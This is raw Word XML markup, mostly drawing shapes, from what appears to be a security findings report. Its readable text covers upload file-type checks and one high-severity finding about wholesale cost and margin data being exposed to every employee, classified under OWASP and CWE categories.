                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1978" style="position:absolute;width:13906;height:1428;left:3238;top:0;" coordsize="1390650,142875" path="m9525,0l1381125,0c1383755,0,1386000,930,1387860,2791c1389720,4651,1390650,6896,1390650,9525l1390650,133350c1390650,135992,1389720,138224,1387860,140084c1386000,141945,1383755,142875,1381125,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,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79072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6290AD43" wp14:editId="6353DC59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2551807</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19984</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27457" name="Group 27457"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1981" name="Shape 1981"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135992"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135992"/>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457" style="width:22.5pt;height:11.25pt;position:absolute;z-index:-2147483499;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:200.93pt;mso-position-vertical-relative:text;margin-top:-1.57361pt;" coordsize="2857,1428">
                <v:shape id="Shape 1981" style="position:absolute;width:2857;height:1428;left:0;top:0;" coordsize="285750,142875" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4651,285750,6896,285750,9525l285750,133350c285750,135992,284820,138224,282960,140084c281100,141945,278855,142875,276225,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,2790,2791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xls</w:t>
      </w:r>
      <w:proofErr w:type="spell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D0 CF 11 E0 A1 B1 1A E1</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OLE2) or ZIP, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.csv</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> must contain no NUL in its first bytes. A 5,000-row cap before mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E4197" w14:textId="77777777" w:rsidR="008C216B" w:rsidRPr="005C54CB" w:rsidRDefault="008C216B" w:rsidP="008C216B">
      <w:pPr>
        <w:spacing w:after="101"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05545E9E" w14:textId="254B708C"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V-</w:t>
      </w:r>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> · Wholesale cost and margin disclosed to every employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE7CD6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OWASP API3:2023 Broken Object Property Level Authorization</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CWE213</w:t>
      </w:r>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CWE-200</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7E260"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98528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45AAF011" wp14:editId="49C8A4A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6238874" cy="485775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27026" name="Group 27026"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6238874" cy="485775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6238874" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2166" name="Shape 2166"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4895849" y="0"/>
                            <a:ext cx="581026" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581026" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571501" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574131" y="0"/>
                                  <a:pt x="576376" y="930"/>
                                  <a:pt x="578236" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580096" y="4638"/>
                                  <a:pt x="581026" y="6896"/>
                                  <a:pt x="581026" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581026" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581026" y="135979"/>
                                  <a:pt x="580096" y="138224"/>
                                  <a:pt x="578236" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="141945"/>
                                  <a:pt x="574131" y="142875"/>
                                  <a:pt x="571501" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>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69" name="Shape 2169"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5543549" y="0"/>
                            <a:ext cx="695325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694394" y="4638"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="135979"/>
                                  <a:pt x="694394" y="138224"/>
                                  <a:pt x="692535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="141945"/>
                                  <a:pt x="688430" y="142875"/>
                                  <a:pt x="685800" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2778"/>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72" name="Shape 2172"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1685925" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1685925" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1676400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1679030" y="0"/>
                                  <a:pt x="1681275" y="930"/>
                                  <a:pt x="1683135" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1684995" y="4651"/>
                                  <a:pt x="1685925" y="6896"/>
                                  <a:pt x="1685925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1685925" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1685925" y="135979"/>
                                  <a:pt x="1684995" y="138212"/>
                                  <a:pt x="1683135" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1681275" y="141932"/>
                                  <a:pt x="1679030" y="142863"/>
                                  <a:pt x="1676400" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>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75" name="Shape 2175"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1752600" y="171450"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4651"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637245" y="138212"/>
                                  <a:pt x="635385" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141932"/>
                                  <a:pt x="631280" y="142863"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>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78" name="Shape 2178"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2657475" y="171450"/>
                            <a:ext cx="1219200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1219200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1209675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1212306" y="0"/>
                                  <a:pt x="1214551" y="930"/>
                                  <a:pt x="1216411" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1218270" y="4651"/>
                                  <a:pt x="1219200" y="6896"/>
                                  <a:pt x="1219200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1219200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1219200" y="135979"/>
                                  <a:pt x="1218270" y="138212"/>
                                  <a:pt x="1216411" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1214551" y="141932"/>
                                  <a:pt x="1212306" y="142863"/>
                                  <a:pt x="1209675" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135979"/>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81" name="Shape 2181"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5238749" y="171450"/>
                            <a:ext cx="695326" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695326" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685801" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688431" y="0"/>
                                  <a:pt x="690676" y="930"/>
                                  <a:pt x="692536" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694396" y="4651"/>
                                  <a:pt x="695326" y="6896"/>
                                  <a:pt x="695326" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695326" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695326" y="135979"/>
                                  <a:pt x="694396" y="138212"/>
                                  <a:pt x="692536" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690676" y="141932"/>
                                  <a:pt x="688431" y="142863"/>
                                  <a:pt x="685801" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>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84" name="Shape 2184"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="352425"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126442"/>
                                  <a:pt x="694395" y="128687"/>
                                  <a:pt x="692535" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132407"/>
                                  <a:pt x="688430" y="133338"/>
                                  <a:pt x="685800" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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87" name="Shape 2187"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="762000" y="352425"/>
                            <a:ext cx="1047750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043100" y="930"/>
                                  <a:pt x="1044960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4638"/>
                                  <a:pt x="1047750" y="6896"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="126442"/>
                                  <a:pt x="1046820" y="128687"/>
                                  <a:pt x="1044960" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043100" y="132407"/>
                                  <a:pt x="1040855" y="133338"/>
                                  <a:pt x="1038225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126442"/>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90" name="Shape 2190"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3162300" y="352425"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4638"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126442"/>
                                  <a:pt x="637245" y="128687"/>
                                  <a:pt x="635385" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126442"/>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193" name="Shape 2193"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4067174" y="352425"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4638"/>
                                  <a:pt x="752475" y="6896"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126442"/>
                                  <a:pt x="751545" y="128687"/>
                                  <a:pt x="749685" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="132407"/>
                                  <a:pt x="745580" y="133338"/>
                                  <a:pt x="742950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126442"/>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7026" style="width:491.25pt;height:38.25pt;position:absolute;z-index:-2147483486;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="62388,4857">
                <v:shape id="Shape 2166" style="position:absolute;width:5810;height:1428;left:48958;top:0;" coordsize="581026,142875" path="m9526,0l571501,0c574131,0,576376,930,578236,2778c580096,4638,581026,6896,581026,9525l581026,133350c581026,135979,580096,138224,578236,140084c576376,141945,574131,142875,571501,142875l9526,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,1,133350l1,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2169" style="position:absolute;width:6953;height:1428;left:55435;top:0;" coordsize="695325,142875" path="m9526,0l685800,0c688430,0,690675,930,692535,2778c694394,4638,695325,6896,695325,9525l695325,133350c695325,135979,694394,138224,692535,140084c690675,141945,688430,142875,685800,142875l9526,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,1,133350l1,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2172" style="position:absolute;width:16859;height:1428;left:0;top:1714;" coordsize="1685925,142875" path="m9525,0l1676400,0c1679030,0,1681275,930,1683135,2791c1684995,4651,1685925,6896,1685925,9525l1685925,133350c1685925,135979,1684995,138212,1683135,140072c1681275,141932,1679030,142863,1676400,142875l9525,142875c6895,142863,4650,141932,2790,140072l0,133350l0,9525l2790,2791c4650,930,6895,0,9525,0x">
